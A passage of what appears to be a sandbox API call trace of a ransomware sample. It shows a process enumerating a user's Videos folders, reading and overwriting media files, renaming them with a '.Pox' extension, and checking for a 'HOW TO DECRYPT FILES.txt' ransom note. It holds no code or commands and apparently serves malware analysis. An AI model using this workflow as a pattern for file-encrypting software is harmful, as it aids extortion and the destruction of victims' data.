HALPmcxz\\Videos", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpFilePart=0x0) returned 0x24 [0041.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpFilePart=0x0) returned 0x25 [0041.355] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17f0dc40, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17f0dc40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.355] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x17f0dc40, ftLastAccessTime.dwHighDateTime=0x1d53803, ftLastWriteTime.dwLowDateTime=0x17f0dc40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.355] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.355] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df9fd50, ftCreationTime.dwHighDateTime=0x1d4c6bd, ftLastAccessTime.dwLowDateTime=0x8bae04a0, ftLastAccessTime.dwHighDateTime=0x1d4d4df, ftLastWriteTime.dwLowDateTime=0x8bae04a0, ftLastWriteTime.dwHighDateTime=0x1d4d4df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gPUcqx", cAlternateFileName="")) returned 1 [0041.356] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5027b040, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x53841f30, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x53841f30, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h6S9PxWHBy_gh7P", cAlternateFileName="H6S9PX~1")) returned 1 [0041.356] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qJcDr1", cAlternateFileName="")) returned 1 [0041.356] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.356] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0041.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0041.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx", lpFilePart=0x0) returned 0x2b [0041.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\", lpFilePart=0x0) returned 0x2c [0041.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df9fd50, ftCreationTime.dwHighDateTime=0x1d4c6bd, ftLastAccessTime.dwLowDateTime=0x8bae04a0, ftLastAccessTime.dwHighDateTime=0x1d4d4df, ftLastWriteTime.dwLowDateTime=0x8bae04a0, ftLastWriteTime.dwHighDateTime=0x1d4d4df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.357] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df9fd50, ftCreationTime.dwHighDateTime=0x1d4c6bd, ftLastAccessTime.dwLowDateTime=0x8bae04a0, ftLastAccessTime.dwHighDateTime=0x1d4d4df, ftLastWriteTime.dwLowDateTime=0x8bae04a0, ftLastWriteTime.dwHighDateTime=0x1d4d4df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.357] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ed56a0, ftCreationTime.dwHighDateTime=0x1d4cfa8, ftLastAccessTime.dwLowDateTime=0x15d72140, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x15d72140, ftLastWriteTime.dwHighDateTime=0x1d4d466, nFileSizeHigh=0x0, nFileSizeLow=0x11bdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="-FQ_DUA4P.avi", cAlternateFileName="-FQ_DU~1.AVI")) returned 1 [0041.357] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.357] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx", lpFilePart=0x0) returned 0x2b [0041.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\", lpFilePart=0x0) returned 0x2c [0041.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df9fd50, ftCreationTime.dwHighDateTime=0x1d4c6bd, ftLastAccessTime.dwLowDateTime=0x8bae04a0, ftLastAccessTime.dwHighDateTime=0x1d4d4df, ftLastWriteTime.dwLowDateTime=0x8bae04a0, ftLastWriteTime.dwHighDateTime=0x1d4d4df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.358] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df9fd50, ftCreationTime.dwHighDateTime=0x1d4c6bd, ftLastAccessTime.dwLowDateTime=0x8bae04a0, ftLastAccessTime.dwHighDateTime=0x1d4d4df, ftLastWriteTime.dwLowDateTime=0x8bae04a0, ftLastWriteTime.dwHighDateTime=0x1d4d4df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.358] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ed56a0, ftCreationTime.dwHighDateTime=0x1d4cfa8, ftLastAccessTime.dwLowDateTime=0x15d72140, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x15d72140, ftLastWriteTime.dwHighDateTime=0x1d4d466, nFileSizeHigh=0x0, nFileSizeLow=0x11bdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="-FQ_DUA4P.avi", cAlternateFileName="-FQ_DU~1.AVI")) returned 1 [0041.358] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ed56a0, ftCreationTime.dwHighDateTime=0x1d4cfa8, ftLastAccessTime.dwLowDateTime=0x15d72140, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x15d72140, ftLastWriteTime.dwHighDateTime=0x1d4d466, nFileSizeHigh=0x0, nFileSizeLow=0x11bdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="-FQ_DUA4P.avi", cAlternateFileName="-FQ_DU~1.AVI")) returned 0 [0041.358] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi", lpFilePart=0x0) returned 0x39 [0041.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpucqx\\-fq_dua4p.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.359] GetFileType (hFile=0x26c) returned 0x1 [0041.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.359] GetFileType (hFile=0x26c) returned 0x1 [0041.359] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x11bdb [0041.359] ReadFile (in: hFile=0x26c, lpBuffer=0x2483124, nNumberOfBytesToRead=0x11bdb, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x2483124*, lpNumberOfBytesRead=0x3ae4fc*=0x11bdb, lpOverlapped=0x0) returned 1 [0041.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.426] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi", lpFilePart=0x0) returned 0x39 [0041.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpucqx\\-fq_dua4p.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.428] GetFileType (hFile=0x26c) returned 0x1 [0041.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.428] GetFileType (hFile=0x26c) returned 0x1 [0041.428] WriteFile (in: hFile=0x26c, lpBuffer=0x25052c4*, nNumberOfBytesToWrite=0x11be0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x25052c4*, lpNumberOfBytesWritten=0x3ae4f0*=0x11be0, lpOverlapped=0x0) returned 1 [0041.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi", lpFilePart=0x0) returned 0x39 [0041.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi.Pox", lpFilePart=0x0) returned 0x3d [0041.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpucqx\\-fq_dua4p.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ed56a0, ftCreationTime.dwHighDateTime=0x1d4cfa8, ftLastAccessTime.dwLowDateTime=0x15d72140, ftLastAccessTime.dwHighDateTime=0x1d4d466, ftLastWriteTime.dwLowDateTime=0x2ae093e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x11be0)) returned 1 [0041.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.430] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpucqx\\-fq_dua4p.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gPUcqx\\-FQ_DUA4P.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gpucqx\\-fq_dua4p.avi.pox")) returned 1 [0041.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P", lpFilePart=0x0) returned 0x34 [0041.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\", lpFilePart=0x0) returned 0x35 [0041.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5027b040, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x53841f30, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x53841f30, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0041.432] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5027b040, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x53841f30, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x53841f30, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.433] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8728e2b0, ftCreationTime.dwHighDateTime=0x1d4ce31, ftLastAccessTime.dwLowDateTime=0x28dbee80, ftLastAccessTime.dwHighDateTime=0x1d4d419, ftLastWriteTime.dwLowDateTime=0x28dbee80, ftLastWriteTime.dwHighDateTime=0x1d4d419, nFileSizeHigh=0x0, nFileSizeLow=0x15945, dwReserved0=0x0, dwReserved1=0x0, cFileName="7XiLQ.swf", cAlternateFileName="")) returned 1 [0041.433] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e573640, ftCreationTime.dwHighDateTime=0x1d4d30b, ftLastAccessTime.dwLowDateTime=0x73e422f0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0x73e422f0, ftLastWriteTime.dwHighDateTime=0x1d4d273, nFileSizeHigh=0x0, nFileSizeLow=0x120a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gulHrt0neWOD_3I7h8D3.mp4", cAlternateFileName="GULHRT~1.MP4")) returned 1 [0041.433] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11c9e50, ftCreationTime.dwHighDateTime=0x1d4cc0c, ftLastAccessTime.dwLowDateTime=0x1c5a0fe0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0x1c5a0fe0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x198a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ulsp8p_Vf-DIGm.mp4", cAlternateFileName="ULSP8P~1.MP4")) returned 1 [0041.433] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.433] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0041.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P", lpFilePart=0x0) returned 0x34 [0041.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\", lpFilePart=0x0) returned 0x35 [0041.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5027b040, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x53841f30, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x53841f30, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0041.434] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5027b040, ftCreationTime.dwHighDateTime=0x1d4cf3d, ftLastAccessTime.dwLowDateTime=0x53841f30, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x53841f30, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8728e2b0, ftCreationTime.dwHighDateTime=0x1d4ce31, ftLastAccessTime.dwLowDateTime=0x28dbee80, ftLastAccessTime.dwHighDateTime=0x1d4d419, ftLastWriteTime.dwLowDateTime=0x28dbee80, ftLastWriteTime.dwHighDateTime=0x1d4d419, nFileSizeHigh=0x0, nFileSizeLow=0x15945, dwReserved0=0x0, dwReserved1=0x0, cFileName="7XiLQ.swf", cAlternateFileName="")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e573640, ftCreationTime.dwHighDateTime=0x1d4d30b, ftLastAccessTime.dwLowDateTime=0x73e422f0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0x73e422f0, ftLastWriteTime.dwHighDateTime=0x1d4d273, nFileSizeHigh=0x0, nFileSizeLow=0x120a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gulHrt0neWOD_3I7h8D3.mp4", cAlternateFileName="GULHRT~1.MP4")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11c9e50, ftCreationTime.dwHighDateTime=0x1d4cc0c, ftLastAccessTime.dwLowDateTime=0x1c5a0fe0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0x1c5a0fe0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x198a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ulsp8p_Vf-DIGm.mp4", cAlternateFileName="ULSP8P~1.MP4")) returned 1 [0041.434] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11c9e50, ftCreationTime.dwHighDateTime=0x1d4cc0c, ftLastAccessTime.dwLowDateTime=0x1c5a0fe0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0x1c5a0fe0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x198a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ulsp8p_Vf-DIGm.mp4", cAlternateFileName="ULSP8P~1.MP4")) returned 0 [0041.434] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0041.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4", lpFilePart=0x0) returned 0x4d [0041.434] SetThreadErrorMode 